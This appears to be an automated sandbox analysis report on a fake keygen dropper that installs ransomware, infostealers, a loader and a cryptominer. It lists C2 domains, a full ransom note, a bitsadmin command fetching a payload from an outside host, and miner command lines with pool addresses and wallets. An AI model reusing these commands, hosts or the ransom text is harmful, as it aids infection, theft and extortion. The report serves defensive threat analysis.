Resubmissions

24-04-2021 20:28

210424-hdvwe2nvza 10

24-04-2021 19:13

210424-ybjq8yj7ej 10

24-04-2021 19:13

210424-lbec8bsxas 10

24-04-2021 19:13

210424-p1q7nfdl5n 10

24-04-2021 19:13

210424-zsvmftzny6 10

24-04-2021 15:54

210424-bvebvx5d4j 10

24-04-2021 08:51

210424-fycslxztl2 10

24-04-2021 06:48

210424-dpw71r8bwa 10

Analysis

  • max time kernel
    1788s
  • max time network
    1793s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    24-04-2021 19:13

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: rootiunik@cock.li and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: rootiunik@cock.li Reserved email: TimothyCrabtree@protonmail.com Your personal ID: 38C-388-70A Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Emails

rootiunik@cock.li

TimothyCrabtree@protonmail.com

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • XMRig Miner Payload 4 IoCs
  • Blocklisted process makes network request 11 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 57 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 12 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:888
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:1992
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {EEF9DB4B-5175-473D-ABCB-7D92BD171A98} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
            3⤵
              PID:1232
              • C:\Users\Admin\AppData\Roaming\rhhsrgc
                C:\Users\Admin\AppData\Roaming\rhhsrgc
                4⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:2632
              • C:\Users\Admin\AppData\Roaming\vihsrgc
                C:\Users\Admin\AppData\Roaming\vihsrgc
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1832
                • C:\Users\Admin\AppData\Roaming\vihsrgc
                  C:\Users\Admin\AppData\Roaming\vihsrgc
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:2660
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {4DF9189F-78C2-4DA6-9544-DD78370BC3C7} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
              3⤵
                PID:1832
                • C:\Users\Admin\AppData\Roaming\rhhsrgc
                  C:\Users\Admin\AppData\Roaming\rhhsrgc
                  4⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:2656
                • C:\Users\Admin\AppData\Roaming\vihsrgc
                  C:\Users\Admin\AppData\Roaming\vihsrgc
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:2996
                  • C:\Users\Admin\AppData\Roaming\vihsrgc
                    C:\Users\Admin\AppData\Roaming\vihsrgc
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:2440
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
              • Drops file in System32 directory
              • Checks processor information in registry
              • Modifies data under HKEY_USERS
              • Modifies registry class
              PID:800
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              2⤵
                PID:2036
            • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
              "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
              1⤵
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Suspicious use of WriteProcessMemory
              PID:1268
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                2⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1064
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  3⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2000
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1744
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1708
                • C:\Users\Admin\AppData\Local\Temp\is-RGFC9.tmp\Install.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-RGFC9.tmp\Install.tmp" /SL5="$30182,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1700
                  • C:\Users\Admin\AppData\Local\Temp\is-4NRML.tmp\Ultra.exe
                    "C:\Users\Admin\AppData\Local\Temp\is-4NRML.tmp\Ultra.exe" /S /UID=burnerch1
                    4⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Modifies system certificate store
                    • Suspicious use of WriteProcessMemory
                    PID:872
                    • C:\Program Files\MSBuild\MBCFTWILHZ\ultramediaburner.exe
                      "C:\Program Files\MSBuild\MBCFTWILHZ\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1384
                      • C:\Users\Admin\AppData\Local\Temp\is-5N0GG.tmp\ultramediaburner.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-5N0GG.tmp\ultramediaburner.tmp" /SL5="$2018A,281924,62464,C:\Program Files\MSBuild\MBCFTWILHZ\ultramediaburner.exe" /VERYSILENT
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:1356
                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                          7⤵
                          • Executes dropped EXE
                          PID:608
                    • C:\Users\Admin\AppData\Local\Temp\22-15aa7-615-2a9b2-c065dae1db029\Bohavaexeho.exe
                      "C:\Users\Admin\AppData\Local\Temp\22-15aa7-615-2a9b2-c065dae1db029\Bohavaexeho.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:1444
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        PID:1428
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1428 CREDAT:275457 /prefetch:2
                          7⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          PID:1600
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1428 CREDAT:537609 /prefetch:2
                          7⤵
                          • Modifies Internet Explorer settings
                          • NTFS ADS
                          • Suspicious use of SetWindowsHookEx
                          PID:2608
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1428 CREDAT:734227 /prefetch:2
                          7⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          PID:2928
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                        6⤵
                          PID:2308
                      • C:\Users\Admin\AppData\Local\Temp\ab-14f7c-b68-6dc96-4d24c4268baea\Vushudamaja.exe
                        "C:\Users\Admin\AppData\Local\Temp\ab-14f7c-b68-6dc96-4d24c4268baea\Vushudamaja.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1624
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aw1zhnby.ixu\instEU.exe & exit
                          6⤵
                            PID:2968
                            • C:\Users\Admin\AppData\Local\Temp\aw1zhnby.ixu\instEU.exe
                              C:\Users\Admin\AppData\Local\Temp\aw1zhnby.ixu\instEU.exe
                              7⤵
                              • Executes dropped EXE
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:2176
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wgju3se3.24z\google-game.exe & exit
                            6⤵
                              PID:2956
                              • C:\Users\Admin\AppData\Local\Temp\wgju3se3.24z\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\wgju3se3.24z\google-game.exe
                                7⤵
                                  PID:2180
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                    • Loads dropped DLL
                                    • Modifies registry class
                                    PID:2732
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rljemrfc.aeg\md1_1eaf.exe & exit
                                6⤵
                                • Blocklisted process makes network request
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious use of SetThreadContext
                                • Modifies system certificate store
                                PID:2272
                                • C:\Users\Admin\AppData\Local\Temp\rljemrfc.aeg\md1_1eaf.exe
                                  C:\Users\Admin\AppData\Local\Temp\rljemrfc.aeg\md1_1eaf.exe
                                  7⤵
                                    PID:2992
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\anfezhf3.hem\askinstall39.exe & exit
                                  6⤵
                                    PID:924
                                    • C:\Users\Admin\AppData\Local\Temp\anfezhf3.hem\askinstall39.exe
                                      C:\Users\Admin\AppData\Local\Temp\anfezhf3.hem\askinstall39.exe
                                      7⤵
                                        PID:3060
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          8⤵
                                            PID:1628
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              9⤵
                                              • Kills process with taskkill
                                              PID:2264
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hbdxxzuv.hx5\inst.exe & exit
                                        6⤵
                                          PID:1192
                                          • C:\Users\Admin\AppData\Local\Temp\hbdxxzuv.hx5\inst.exe
                                            C:\Users\Admin\AppData\Local\Temp\hbdxxzuv.hx5\inst.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:2576
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hyohf1s5.ddg\SunLabsPlayer.exe /S & exit
                                          6⤵
                                            PID:2488
                                            • C:\Users\Admin\AppData\Local\Temp\hyohf1s5.ddg\SunLabsPlayer.exe
                                              C:\Users\Admin\AppData\Local\Temp\hyohf1s5.ddg\SunLabsPlayer.exe /S
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:3004
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                8⤵
                                                  PID:1192
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:2708
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:976
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:2300
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:2912
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:1812
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Checks for any installed AV software in registry
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2180
                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                            8⤵
                                                            • Download via BitsAdmin
                                                            PID:3064
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pK2IQC0j7i1EXgju -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:1404
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peb4jzywoorYfqjx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:2584
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:1816
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:1744
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:2468
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2900
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:2664
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\GdVzvqerHYFl\GdVzvqerHYFl.dll" GdVzvqerHYFl
                                                                      8⤵
                                                                        PID:2588
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\GdVzvqerHYFl\GdVzvqerHYFl.dll" GdVzvqerHYFl
                                                                          9⤵
                                                                            PID:2416
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2616
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:1252
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:2420
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:1544
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD97F.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:1056
                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3016
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wptgtyze.ji5\GcleanerWW.exe /mixone & exit
                                                                                6⤵
                                                                                  PID:2728
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gehhcswl.0vv\toolspab1.exe & exit
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2980
                                                                                  • C:\Users\Admin\AppData\Local\Temp\gehhcswl.0vv\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\gehhcswl.0vv\toolspab1.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                    PID:2444
                                                                                    • C:\Users\Admin\AppData\Local\Temp\gehhcswl.0vv\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\gehhcswl.0vv\toolspab1.exe
                                                                                      8⤵
                                                                                        PID:2508
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jdeey5z0.twk\c7ae36fa.exe & exit
                                                                                    6⤵
                                                                                      PID:2384
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jdeey5z0.twk\c7ae36fa.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jdeey5z0.twk\c7ae36fa.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:2820
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ypqnixc.vbc\app.exe /8-2222 & exit
                                                                                      6⤵
                                                                                        PID:2744
                                                                                        • C:\Users\Admin\AppData\Local\Temp\3ypqnixc.vbc\app.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\3ypqnixc.vbc\app.exe /8-2222
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                          PID:2788
                                                                                          • C:\Users\Admin\AppData\Local\Temp\3ypqnixc.vbc\app.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\3ypqnixc.vbc\app.exe" /8-2222
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:2508
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:1684
                                                                                • C:\Users\Admin\AppData\Roaming\71C8.tmp.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\71C8.tmp.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:2252
                                                                                  • C:\Users\Admin\AppData\Roaming\71C8.tmp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\71C8.tmp.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1352
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 748
                                                                                      5⤵
                                                                                      • Loads dropped DLL
                                                                                      • Program crash
                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                      PID:2968
                                                                                • C:\Users\Admin\AppData\Roaming\73AD.tmp.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\73AD.tmp.exe"
                                                                                  3⤵
                                                                                    PID:2272
                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w21214@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                      4⤵
                                                                                        PID:2448
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w13501 --cpu-max-threads-hint 50 -r 9999
                                                                                        4⤵
                                                                                        • Blocklisted process makes network request
                                                                                        PID:2716
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      3⤵
                                                                                        PID:2496
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 127.0.0.1
                                                                                          4⤵
                                                                                          • Runs ping.exe
                                                                                          PID:2632
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1396
